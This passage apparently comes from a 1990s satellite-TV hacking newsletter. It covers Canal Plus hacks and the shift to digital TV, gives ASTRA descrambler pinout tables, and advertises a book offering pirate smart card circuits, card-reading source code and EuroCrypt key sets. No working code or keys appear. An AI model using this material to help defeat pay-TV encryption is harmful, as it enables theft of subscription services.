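The simulation is noiseless, which is what makes the per-line mapping exact; on real off-air video the burst phase would have to be measured to better than a quarter of a degree, after removing the receiver's own phase drift, before the same mapping would hold.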


The effectiveness of the hack on satellite delivered SECAM version of some of the 
Canal Plus channels may be limited. It seems that Canal Plus are making a 
concerted effort to go digital. This means that they will not be taking any more 
analogue subscriptions for their satellite channels from September. This will mean 
that the only real targets for the SECAM version will be the cablenet channels. 
These are in the jurisdiction of France. 


Over the next few months the Pay Television market in Europe will change. 
FilmNet and TV1000 may merge operations. This will result in a rationalisation of 
channels and some may disappear. FilmNet’s parent organisation have invested a 
colossal amount of finance in digital television and as yet there seems to be no 
immediate results. Whether they are long range visionaries will be decided soon. 
However a deal with DirecTv may also be in the offing here. 


It seems that the media analysts have got digital television wrong just as they were 
wrong about satellite television in general. Digital television is not going to be sold 
on its television programming. The main selling point of the new digital systems 
will be internet and WWW delivery. It will certainly be interesting to see who will 
make the running. It appears that Rupert Murdoch has already seen the opening. It 
remains to be seen if Nethold can do a tie up deal with some internet service 
provider. Murdoch purchased the Delphi system a few years ago. It will certainly 
be interesting to see if any new DirecTv tie-up in Europe uses this as its 
backchannel. 


One thing is certain; digital television will face more hackers and more threats than 
analogue satellite television ever faced. There inevitably will be hacks and they 
will be easier to distribute as they will be purely software. What better way to get 
these to the decoder than via the decoder’s internet connection? 
The ASTRA Specifications For D-Type Interface 


The D-Type socket is used on many ASTRA receivers for 
interfacing the descrambler with the receiver. The function of each 
pin is given in the text table. 


Pin Connections Table: 
Pin Number 1: Return Audio Input Left 
Pin Number 2: Return Video Input PAL 
Pin Number 3: Video Switch Signal 
Pin Number 4: Baseband Output 
Pin Number 5: Clamped PAL Video Output 
Pin Number 6: Return Audio Input Right 
Pin Number 7: Audio Signal Switch 
Pin Number 8: Ground 
Pin Number 9: RESERVED 
Pin Number 10: RESERVED 
Pin Number 11: Ground 
Pin Number 12: Audio Output Left 
Pin Number 13: Audio Output Right 
Pin Number 14: RESERVED 
Pin Number 15: RESERVED 


The video and audio switch pins select the respective 
descrambler outputs. Pin 3, the Video Switch Signal, is driven to 
12 Volts when the video is scrambled and the descrambler has a 
valid output; this causes the receiver to select the descrambler 
video. When the video is normal (clear) PAL and the descrambler is 
not active, the pin is at ground and the receiver uses its own 
internal video. 
D-Type Connections 

Pin 3 is the video switching control. 
12 V selects external source and 
0 V selects internal. 


Pin 7 is the audio switching control. 
18 V selects external source and 
0 V selects internal. This pin is 
taken low by an internal resistor. 
Unless audio scrambling is in use 
this pin should be left unconnected. 
ASTRA Specifications For SCART Descrambler Interface 


The SCART socket is used on some receivers as a decoder 
interface. The use of loop through means that the operation of the 
descrambler is transparent and the customer will not ideally notice 
a transition from a clear station to a descrambled pay channel. 


Pin Connections Table 
Pin Number 1: Audio Output Right 
Pin Number 2: Return Audio Input Right 
Pin Number 3: Audio Output Left 
Pin Number 4: Audio Ground 
Pin Number 5: RESERVED 
Pin Number 6: Return Audio Input Left 
Pin Number 7: RESERVED 
Pin Number 8: Audio/Video Switch 
Pin Number 9 - 16: Reserved For Other Applications 
Pin Number 17: Video Output Ground 
Pin Number 18: Video Input Ground 
Pin Number 19: Baseband Output 
Pin Number 20: Return Video Input PAL 


Pin Number 21: Common Ground 
Decoder SCART Connections 


As Viewed From Rear Of Receiver 

Pin 4 is Audio Ground. 
Pin 17 is Baseband Output Ground 
Pin 18 is Video Input Ground 
The SCART socket is used on some receivers to connect 
directly to a video recorder or television. 


Pin Connections Table 
Pin Number 1: Audio Output Right 
Pin Number 2: Return Audio Input Right 
Pin Number 3: Audio Output Left 
Pin Number 4: Audio Ground 
Pin Number 5: Blue Return 
Pin Number 6: Return Audio Input Left 
Pin Number 7: Blue Input Or Output 
Pin Number 8: Audio/Video Switch 
Pin Number 9: Green Return 
Pin Number 10: Not Connected 
Pin Number 11: Green Input Or Output 
Pin Number 12: Not Connected 
Pin Number 13: Red Return 
Pin Number 14: Not Connected 
Pin Number 15: Red Input Or Output 
Pin Number 16: Blanking 
Pin Number 17: Video Ground 
Pin Number 18: Blanking Ground 
Pin Number 19: Video Output 
Pin Number 20: Video Input 


Pin Number 21: Common Ground 

Standard SCART Connections 


As Viewed From Rear Of Receiver 

Pin 4 is Audio Ground. 
Pin 17 is Video Output Ground 
Pin 18 is Video Input Ground 
INTERNET ADVERTISING WEB DESIGN 


From Now till December 1996 
We are running a Modem 
Scrappage Scheme. 
Trade in your old for the latest 
28,800 or 33,600! 
Ring for details - or check our website at 
http://www.thecia.ie 
Kaima House, 49 Wainsfort Park, Terenure, Dublin 6w, Ireland. 
Tel: +353-1-4924034 Fax: +353-1-4924035 
E-mail: Insight@internet-ireland.ie 
web address: http://www.internet-ireland.ie/insight 
Satellite Television News Services 


• The Satellite Television Newsline 
0336 413 413 (Voice) 
0336 422-888 (Fax) Intl: +85217277400 


New channel launches. Adult Viewing - what is really going on? Scams 
and cons - what to avoid. The latest rumours and issues investigated. 
New products and services. All the news that affects you whether you 
are a dealer or a viewer. 


The best and most well researched authoritative newsline in the UK, it 
also draws upon the expertise of a team of leading European 
journalists. 


Updated Twice A Day - Seven Days A Week 


• Transponder Watch 


A listing of the latest transponder traffic including details of the latest 
launches, new channels, feeds and tests. 
0336-442-889 (Fax) Intl: +85217277401 


• Hack Watch News Faxback Service 
0336-422-885 (Fax) Intl: +85217277402 


The faxback version of Hack Watch News. Read about the issues 
making the news in the world of signal insecurity. Covers the stories 
that others couldn't even begin to understand. 


Get The Whole Picture 


TV Live Limited, 78 Shepards Way, Rickmansworth, 
Herts, WD3-2NR, UK 
American Hacker Magazine 


Formerly known as Scrambling News, American Hacker is the US's 
leading satellite television insecurity newsletter. It covers the American 
hacker scene with interviews with hackers, product reviews and articles 
on computer hacking and phone phreaking. 


http://www.scramblingnews.com 
Voice & Fax: 716-283-6910 

Scrambling News, 3494 Delaware Avenue #123, 
Buffalo, New York, NY 14217-1230, USA 
$29.95 for 12 issues and BBS access. Call for foreign rates. 





Stockists For The Black Book 


UK 
Baylin Publications, 24 River Gardens, Purley, Reading, RG8-8BX 
Voice: +44(0)836-582-785 Fax: +44(0)118-9414468 


Swift Publications, 17 Pittfield, Cricklade, Wiltshire, SN6-6AN 
Voice: +44(0)1793-750620 Fax: +44(0)1793-752399 

Spain 

IPETEL, Hermosilla 31, Madrid 28001 

Voice: +34-1-5774296 Fax: +34-1-5764966 

USA 

Baylin Publications, 1905 Mariposa, Boulder, CO 80302 
Voice: 303-449-4551 Fax: 303-939-8720 


American Hacker (details above) 
Hack Watch News 


Hack Watch News is Europe's only Satellite and Cable systems insecurity 
newsletter. It covers the world of scrambling systems in a detail that 
nobody else can match. In the past, HWN has printed details of the 
DirecTv hack over six months before it hit the market. HWN has also 
been the leading source of information on the Sky 07, 09 and 10 card 
hacks. 


Piracy On The Final Frontier 


There are two versions of HWN; an electronic version that can be 
e-mailed directly to your internet account and a paper version that is 
sent via post. A subscription to either version gives full access to the 
World famous SPECIAL PROJECTS BBS and also to the Special Projects 
Internet BBS (details can be found on 
http://www.hackwatch.com/~kooltek/bbs.html) 


Ordering Details: 
[ ] 12 Issues HWN (Paper) Europe £49.95, World £77.00 
[ ] 12 Issues e-HWN £35.00 
[ ] Black Book 5 Europe £35, World £44 
Payment Method: [ ] Access [ ] Mastercard [ ] Visa [ ] Cheque [ ] Draft 
Mail To: Hack Watch News, 22 Viewmount, Waterford, Ireland. 
Or Fax To: +353-51-850143 or +353-51-873640 


Name: 





European Scrambling Systems is the "bible" of the 
black arts of signal security. Now in European 
Scrambling Systems 5, John McCormac analyses all 
of the latest hacks and scrambling systems. This 
time systems beyond Europe are examined. 


In This Version 


• How VideoCrypt Was Hacked - Again! 


The Sky 10 card was meant to stop piracy. Read 
how it failed and how Sky's first PPV event was 
hacked. Could this mean that Sky's new PPV 
services are now in jeopardy? Can the McCormac 
Hack be used over the Internet to hack PPV? 


• The DirecTv VideoGuard System 


They were hacks that DirecTv and News 
Datacom claimed were impossible. But they 
happened. Read about how to read information 
from the DSS card along with the C source code. 
Also read how it may be possible to create a Blocker hack for 
this system. Will this system fall to a SEASON type hack? 


• A Compendium Of Pirate Smart Cards And Related Technology 


The most comprehensive set of circuit diagrams and PCB patterns for pirate 
Smart cards, SEASON adapters and Phoenix card programmer - readers 
ever published. Includes the Sky 10 Battery Card and the DSS battery card 
and a PIC16C84 phonecard emulator. 


• EuroCrypt - Catastrophe By Committee 


Read about how the D2-MAC EuroCrypt system was totally compromised 
and steps that the channels implemented to try and stop the hacks. Includes 
a full disassembly of a pirate EuroCrypt card and an examination of the 
essential EuroCrypt commands together with the key sets. 


Warning 
The information contained in this book is for educational use only. The 
publishers and the author do not assume any liability for the use or misuse 
of the information herein. In certain countries the use of certain circuits and 
techniques may be prohibited by law. In some countries, this book is 


Voice&Fax: +353-51-873640 
BBS&Fax: +353-51-850143 V34 

Waterford University Press, email: jmcc@hackwatch.com 

MC2 (Publications Division), http://www.hackwatch.com/kooltek 
22 Viewmount, Waterford Ireland. 


ISBN: 1-873556-22-5 IR£34.00 





